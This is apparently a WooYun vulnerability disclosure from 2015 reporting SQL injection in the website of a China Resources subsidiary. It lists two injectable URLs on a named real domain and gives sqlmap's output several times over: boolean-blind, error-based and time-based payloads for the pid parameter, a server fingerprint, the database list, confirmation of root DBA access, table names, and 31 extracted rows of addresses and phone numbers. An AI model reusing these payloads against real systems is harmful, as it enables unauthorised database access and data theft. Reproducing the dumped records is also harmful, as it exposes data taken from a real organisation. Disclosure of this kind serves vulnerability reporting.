当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134800

漏洞标题:华润集团麾下某公司网站存在SQL注入漏洞

相关厂商:华润五丰有限公司

漏洞作者: 路人甲

提交时间:2015-08-17 17:49

修复时间:2015-10-02 15:26

公开时间:2015-10-02 15:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-18: 厂商已经确认,细节仅向厂商公开
2015-08-28: 细节向核心白帽子及相关领域专家公开
2015-09-07: 细节向普通白帽子公开
2015-09-17: 细节向实习白帽子公开
2015-10-02: 细节向公众公开

简要描述:

华润集团麾下某公司网站存在SQL注入漏洞。

详细说明:

注入点:

http://www.chinawufeng.com/cold.php?pid=13


http://www.chinawufeng.com/fast.php?pid=25


sqlmap identified the following injection point(s) with a total of 203 HTTP(s) requests:
---
Parameter: pid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=13' AND 9779=9779 AND 'KmPx'='KmPx
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: pid=13' AND (SELECT 8320 FROM(SELECT COUNT(*),CONCAT(0x7171767171,(SELECT (ELT(8320=8320,1))),0x7170627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eRRc'='eRRc
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: pid=13' AND SLEEP(5) AND 'WDGL'='WDGL
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.4.4
back-end DBMS: MySQL 5.0
available databases [6]:
[*] chinawufeng
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] wechat


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=13' AND 9779=9779 AND 'KmPx'='KmPx
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: pid=13' AND (SELECT 8320 FROM(SELECT COUNT(*),CONCAT(0x7171767171,(SELECT (ELT(8320=8320,1))),0x7170627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eRRc'='eRRc
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: pid=13' AND SLEEP(5) AND 'WDGL'='WDGL
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.4.4
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
current user is DBA: True
sqlmap resumed the following injection point(s) from stored session:
---

漏洞证明:

Parameter: pid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=13' AND 9779=9779 AND 'KmPx'='KmPx
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: pid=13' AND (SELECT 8320 FROM(SELECT COUNT(*),CONCAT(0x7171767171,(SELECT (ELT(8320=8320,1))),0x7170627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eRRc'='eRRc
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: pid=13' AND SLEEP(5) AND 'WDGL'='WDGL
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.4.4
back-end DBMS: MySQL 5.0
Database: chinawufeng
[18 tables]
+--------------------+
| lbcms_about |
| lbcms_active |
| lbcms_admin |
| lbcms_applications |
| lbcms_buy |
| lbcms_cdrink |
| lbcms_channel |
| lbcms_class |
| lbcms_config |
| lbcms_down |
| lbcms_fast |
| lbcms_field |
| lbcms_rotpic |
| lbcms_ticket |
| ska_comments |
| ska_users |
| wtest_messagequeue |
| wtest_users |
+--------------------+


--部分数据
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.4.4
back-end DBMS: MySQL 5.0
Database: chinawufeng
Table: lbcms_buy
[31 entries]
+--------------------------+---------+---------------+
| addr | content | phone |
+--------------------------+---------+---------------+
| 三门光明路63#(东方百货旁) | NULL | 0576-83337177 |
| 上塘路772号(舟山路口公交站) | NULL | 0571-88282141 |
| 上虞百官街道横利新村西二区1幢101-102号 | NULL | 0575-82135386 |
| 上陡门5组团4幢106-107号(人才大厦对面) | NULL | 0577-88324633 |
| 下沙25号大街284号伊萨卡小区 | NULL | 0571-86906576 |
| 下沙文苑风情2幢商铺2-3 | NULL | 0571-86924476 |
| 东港二村 | NULL | 0512-67489177 |
| 东阳市双岘路128号 | NULL | 0579-86637490 |
| 临安市石镜街699号 | NULL | 0571-63961373 |
| 临平南兴路49号 | NULL | 0571-86220900 |
| 临平梅堰路12-3 | NULL | 0571-86161512 |
| 临海市区水云北路129号 | NULL | 0576-85156668 |
| 丽水中山街295号 | NULL | 0578-2132716 |
| 丽水市大众路98号 | NULL | 0578-2127834 |
| 丽水解放街306号 | NULL | 0578-2151715 |
| 乐清市乐成镇建设西路103-105号 | NULL | 0577-62557279 |
| 乐清市柳市镇后市街109号 | NULL | 0577-62776269 |
| 乐清市虹桥镇虹河东路9号 | NULL | 0577-62373340 |
| 乐购旁再行里42号(开元职高对面) | NULL | 0571-85372877 |
| 五台山路江都路交叉口云川农贸市场 | NULL | 13082567358 |
| 体育场西路93号 | NULL | 0579-84137486 |
| 余姚市阳明东路213号 | NULL | 0574-62681596 |
| 全坊巷43号 | NULL | 0577-88254176 |
| 北仑横河路196号 | NULL | 0574-86833395 |
| 千岛湖镇南山大街605-607号 | NULL | 0571-65067327 |
| 华星路211号(公益中学对面) | NULL | 0571-88930854 |
| 古河巷87-89号(锦绣新村10幢) | NULL | 0571-88063211 |
| 台州临海市台招路12号 | NULL | 0576-85222190 |
| 台州市万昌中路323号 | NULL | 0576-86028065 |
| 台州市椒江区东海大道542号 | NULL | 0576-88518088 |
| 台州市椒江区岩屿路44-45号 | NULL | 0576-88816517 |
+--------------------------+---------+---------------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-18 15:25

厂商回复:

感谢提交

最新状态:

暂无


漏洞评价:

评论